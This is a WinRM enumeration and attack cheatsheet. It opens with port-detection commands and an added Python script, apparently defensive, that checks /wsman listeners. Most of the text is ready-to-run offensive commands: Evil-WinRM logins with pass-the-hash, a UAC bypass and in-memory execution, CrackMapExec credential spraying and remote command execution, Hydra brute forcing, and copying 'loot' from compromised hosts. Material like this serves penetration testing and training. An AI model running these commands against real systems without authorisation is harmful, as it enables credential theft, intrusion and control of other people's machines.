WinRM Enumeration Cheatsheet
Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)
What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.
Detection
nmap -p 5985,5986 <ip>
nmap -p 5985,5986 -sV <ip>
curl -s http://<ip>:5985/wsman
curl -sk https://<ip>:5986/wsman
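Added example (not part of the original cheatsheet): a small stdlib-only Python checker that sends the same unauthenticated request as the curl lines above and classifies the reply, so you can confirm which hosts on your own network actually expose a WS-Management listener rather than just an open port. The classification rules are assumptions based on typical WinRM behaviour (HTTP.sys answers with `Server: Microsoft-HTTPAPI/2.0`, an unauthenticated request gets 401 with `WWW-Authenticate: Negotiate`, or 405 for non-POST methods); hostnames and ports passed on the command line are yours.

```python
"""WinRM listener inventory check (added example, not from the cheatsheet).

Probes /wsman on 5985 (HTTP) and 5986 (HTTPS) exactly like the curl lines
and classifies the reply. Standard library only.
"""
import http.client
import ssl
import sys

WSMAN_PATH = "/wsman"


def classify_wsman_response(status, headers):
    """Classify an HTTP reply to an unauthenticated request for /wsman.

    Assumed typical WinRM behaviour (not stated on the cheatsheet):
      - the listener is served by HTTP.sys, so Server is "Microsoft-HTTPAPI/2.0"
      - an unauthenticated POST gets 401 with WWW-Authenticate: Negotiate
        (plus Basic when Basic auth is enabled on the listener)
      - any method other than POST gets 405
    Returns "winrm", "winrm-basic-enabled" or "http-other".
    """
    merged = {}
    for name, value in headers:          # repeated headers (several auth schemes) are joined
        merged.setdefault(name.lower(), []).append(value)
    server = " ".join(merged.get("server", [])).lower()
    auth = " ".join(merged.get("www-authenticate", [])).lower()
    if "microsoft-httpapi" not in server:
        return "http-other"
    if status == 401:
        # Basic on the listener is worth flagging: with AllowUnencrypted it
        # means base64 credentials travel over plain HTTP on 5985.
        if "basic" in auth:
            return "winrm-basic-enabled"
        if "negotiate" in auth:
            return "winrm"
    if status == 405:
        return "winrm"
    return "http-other"


def probe(host, port=5985, use_tls=False, timeout=5.0):
    """Send one unauthenticated POST to /wsman, return (status, header list).

    Raises OSError/HTTPException on connection problems so the caller can
    tell "closed" apart from "open but not WinRM".
    """
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE   # self-signed listener certs are the norm
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", WSMAN_PATH, body=b"",
                     headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheaders()
    finally:
        conn.close()


def inventory(hosts):
    """Return {host: {port: classification}}; "closed" when the port does not answer."""
    results = {}
    for host in hosts:
        results[host] = {}
        for port, tls in ((5985, False), (5986, True)):
            try:
                status, headers = probe(host, port, tls)
                results[host][port] = classify_wsman_response(status, headers)
            except (OSError, http.client.HTTPException):
                results[host][port] = "closed"
    return results


if __name__ == "__main__":
    # usage: python3 wsman_inventory.py host1 host2 ...
    for host, ports in inventory(sys.argv[1:]).items():
        print(host, ports)
```

`winrm-basic-enabled` on port 5985 is the result to chase first when reviewing your own hosts; `closed` on both ports means the service is not reachable from where you ran the check, not that it is disabled.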
Evil-WinRM
# Password auth (HTTP)
evil-winrm -i <ip> -u <user> -p <pass>
# SSL (HTTPS, port 5986)
evil-winrm -i <ip> -u <user> -p <pass> -S
# Pass-the-Hash (NTLM)
evil-winrm -i <ip> -u <user> -H <nthash>
# With scripts and executables directory
evil-winrm -i <ip> -u <user> -p <pass> \
-s /path/to/ps1_scripts/ \
-e /path/to/executables/
# Within evil-winrm shell
menu # Show built-in commands
upload /local/file.exe # Upload file
download C:\file.txt # Download file
Invoke-Binary /local/exe # Run local exe in memory
bypass_uac # UAC bypass
CrackMapExec
# Test credentials
crackmapexec winrm <ip> -u <user> -p <pass>
crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass>
# Credential spray
crackmapexec winrm <ip> -u users.txt -p <pass>
crackmapexec winrm <ip> -u <user> -p wordlist.txt
# Pass-the-Hash
crackmapexec winrm <ip> -u <user> -H <nthash>
# Execute commands
crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami' # CMD
crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami' # PowerShell
crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process'
PowerShell / Windows Native
# Test WinRM connectivity
Test-WSMan -ComputerName <ip>
Test-WSMan -ComputerName <ip> -UseSSL
# Interactive remote session
Enter-PSSession -ComputerName <ip> -Credential <user>
Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user>
# Non-interactive / scripted
$cred = Get-Credential
$sess = New-PSSession -ComputerName <ip> -Credential $cred
Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }
Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig }
# Copy files over WinRM
Copy-Item -Path C:\local\file.exe -Destination C:\remote\ -ToSession $sess
Copy-Item -Path C:\remote\loot.txt -Destination C:\local\ -FromSession $sess
impacket
# winrm_exec (alternative)
python3 winrm_exec.py <domain>/<user>:<pass>@<ip>
Brute Force
crackmapexec winrm <ip> -u <user> -p wordlist.txt
hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \
"/wsman:Username=^USER^&Password=^PASS^:401"
Common Scenarios
Pwned user is in group:
"Remote Management Users" → Can use WinRM
"Administrators" → Full access via WinRM
Check group membership:
net localgroup "Remote Management Users"
Key Facts
- Requires user to be in Remote Management Users or Administrators group
- Can be enabled with: Enable-PSRemoting -Force
- Firewall rule: WinRM-HTTP-In-TCP (port 5985)
- Often enabled on Domain Controllers and management servers